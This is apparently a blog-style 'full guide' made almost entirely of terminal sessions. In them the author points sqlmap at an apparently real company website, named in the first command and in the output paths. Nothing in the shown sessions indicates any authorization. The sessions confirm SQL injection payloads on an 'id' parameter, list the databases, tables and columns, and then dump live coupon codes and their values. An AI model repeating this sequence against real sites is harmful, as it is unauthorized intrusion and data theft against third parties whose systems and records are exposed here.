SQLMAP ATTACK ( FULL GUIDE )
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a powerful detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections. |
root@ankit:~# sqlmap -u www.wjhy.com.hk/en/product_detail.php?id=25 --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.1.9#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:14:45
[03:14:45] [INFO] testing connection to the target URL
[03:14:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:14:48] [WARNING] reflective value(s) found and filtering out
[03:14:48] [INFO] testing if the target URL is stable
[03:14:49] [INFO] target URL is stable
[03:14:49] [INFO] testing if GET parameter 'id' is dynamic
[03:14:49] [INFO] confirming that GET parameter 'id' is dynamic
[03:14:50] [INFO] GET parameter 'id' is dynamic
[03:14:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:14:51] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[03:14:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:15:01] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Potted Roses")
[03:15:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:15:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:15:03] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[03:15:07] [INFO] target URL appears to have 23 columns in query
[03:15:10] [WARNING] combined UNION/error-based SQL injection case found on column 17. sqlmap will try to find another column with better characteristics
[03:15:12] [WARNING] combined UNION/error-based SQL injection case found on column 10. sqlmap will try to find another column with better characteristics
[03:15:18] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[03:15:20] [WARNING] combined UNION/error-based SQL injection case found on column 23. sqlmap will try to find another column with better characteristics
[03:15:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=25 AND 9762=9762
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=25 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627a71,0x7850455041486a6a765954696e73526c654366597353754e757761466c61556678754a7850515176,0x7176627071)-- HfnZ
---
[03:22:16] [INFO] testing MySQL
[03:22:17] [INFO] confirming MySQL
[03:22:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:22:19] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] waiji
[03:22:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.wjhy.com.hk'
[*] shutting down at 03:22:19
SECOND COMMAND => sqlmap -u www.XYZ.com.hk/en/product_detail.php?id=25 -D waiji --tables
root@ankit:~# sqlmap -u www.XYZ.com.hk/en/product_detail.php?id=25 -D waiji --tables
___
__H__
___ ___[(]_____ ___ ___ {1.1.9#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:23:09
[03:23:09] [INFO] resuming back-end DBMS 'mysql'
[03:23:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=25 AND 9762=9762
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=25 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627a71,0x7850455041486a6a765954696e73526c654366597353754e757761466c61556678754a7850515176,0x7176627071)-- HfnZ
---
[03:23:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[03:23:11] [INFO] fetching tables for database: 'waiji'
[03:23:11] [WARNING] reflective value(s) found and filtering out
Database: waiji
[35 tables]
+---------------------------------+
| attachment |
| banner |
| city |
| company |
| company_cate |
| country |
| coupon |
| download_cate |
| media |
| member |
| news |
| news_cate |
| paydollar_data_feed |
| po_addr |
| po_mst |
| po_st_log |
| po_x_coupon_rltn |
| po_x_prd_inv_rltn |
| po_x_prd_rltn |
| prd |
| prd_brand |
| prd_brand_x_prd_collection_rltn |
| prd_cate |
| prd_collection |
| prd_color |
| prd_inv |
| prd_inv_size |
| prd_material |
| prd_pattern |
| prd_size |
| prd_sub_cate |
| recruitment |
| report |
| usr |
| webpage_content |
+--------------------------------------+
[03:23:11] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.XYZ.com.hk'
THIRD COMMAND => sqlmap -u www.XYZ.com.hk/en/product_detail.php?id=25 -D waiji -T coupon --columns
[*] shutting down at 03:23
root@ankit:~# sqlmap -u www.XYZ.com.hk/en/product_detail.php?id=25 -D waiji -T coupon --columns
___
__H__
___ ___[.]_____ ___ ___ {1.1.9#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:27:11
[03:27:12] [INFO] resuming back-end DBMS 'mysql'
[03:27:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=25 AND 9762=9762
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=25 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627a71,0x7850455041486a6a765954696e73526c654366597353754e757761466c61556678754a7850515176,0x7176627071)-- HfnZ
---
[03:27:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[03:27:13] [INFO] fetching columns for table 'coupon' in database 'waiji'
[03:27:14] [WARNING] reflective value(s) found and filtering out
Database: waiji
Table: coupon
[22 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| cp_cd | varchar(32) |
| cp_crt_dt | timestamp |
| cp_crt_ip | varchar(32) |
| cp_crt_usr_id | bigint(20) |
| cp_eff_end_dt | datetime |
| cp_eff_start_dt | datetime |
| cp_fixed | enum('Y','N') |
| cp_id | bigint(20) |
| cp_mod_dt | datetime |
| cp_mod_ip | varchar(32) |
| cp_mod_usr_id | bigint(20) |
| cp_over_purchase | decimal(8,2) |
| cp_percent | int(11) |
| cp_price | decimal(8,2) |
| cp_ref | varchar(128) |
| cp_show | enum('Y','N') |
| cp_sort_fix | enum('Y','N') |
| cp_sort_id | bigint(20) |
| cp_sort_lv | int(11) |
| cp_st | varchar(4) |
| cp_tp | tinyint(4) |
| cp_use_limit | int(11) |
+------------------+---------------+
[03:27:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.XYZ.com.hk'
[*] shutting down at 03:27:14
FOUTH COMMAND => sqlmap -u www.XYZ.com.hk/en/product_detail.php?id=25 -D waiji -T coupon -C cp_price,cp_use_limit,cp_id,cp_cd --dump
root@ankit:~# sqlmap -u www.XYZ.com.hk/en/product_detail.php?id=25 -D waiji -T coupon -C cp_price,cp_use_limit,cp_id,cp_cd --dump
___
__H__
___ ___[.]_____ ___ ___ {1.1.9#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 03:46:06
[03:46:07] [INFO] resuming back-end DBMS 'mysql'
[03:46:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=25 AND 9762=9762
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: id=25 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627a71,0x7850455041486a6a765954696e73526c654366597353754e757761466c61556678754a7850515176,0x7176627071)-- HfnZ
---
[03:46:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[03:46:08] [INFO] fetching entries of column(s) 'cp_cd, cp_id, cp_price, cp_use_limit' for table 'coupon' in database 'waiji'
[03:46:08] [INFO] the SQL query used returns 10 entries
[03:46:09] [WARNING] reflective value(s) found and filtering out
[03:46:09] [INFO] retrieved: "qwqwqw-238589389","1","100.00","1"
[03:46:09] [INFO] retrieved: "123123123","2","1234.00","1"
[03:46:10] [INFO] retrieved: "OCT92489","3","50.00","1"
[03:46:11] [INFO] retrieved: "OCT96461","4","50.00","1"
[03:46:11] [INFO] retrieved: "OCT68300","5","50.00","1"
[03:46:12] [INFO] retrieved: "OCT46628","6","50.00","1"
[03:46:13] [INFO] retrieved: "OCT80922","7","50.00","1"
[03:46:13] [INFO] retrieved: "OCT77512","8","50.00","1"
[03:46:14] [INFO] retrieved: "abc","18","50.00","0"
[03:46:14] [INFO] retrieved: "123123","19","50.00","0"
[03:46:15] [INFO] analyzing table dump for possible password hashes
Database: waiji
Table: coupon
[10 entries]
+----------+--------------+-------+------------------+
| cp_price | cp_use_limit | cp_id | cp_cd |
+----------+--------------+-------+------------------+
| 100.00 | 1 | 1 | qwqwqw-238589389 |
| 1234.00 | 1 | 2 | 123123123 |
| 50.00 | 1 | 3 | OCT92489 |
| 50.00 | 1 | 4 | OCT96461 |
| 50.00 | 1 | 5 | OCT68300 |
| 50.00 | 1 | 6 | OCT46628 |
| 50.00 | 1 | 7 | OCT80922 |
| 50.00 | 1 | 8 | OCT77512 |
| 50.00 | 0 | 18 | abc |
| 50.00 | 0 | 19 | 123123 |
+----------+--------------+-------+------------------+
[03:46:15] [INFO] table 'waiji.coupon' dumped to CSV file '/root/.sqlmap/output/www.wjhy.com.hk/dump/waiji/coupon.csv'
[03:46:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.XYZ.com.hk'
[*] shutting down at 03:46:15
THANK YOU 🙂🙂
Comments
Post a Comment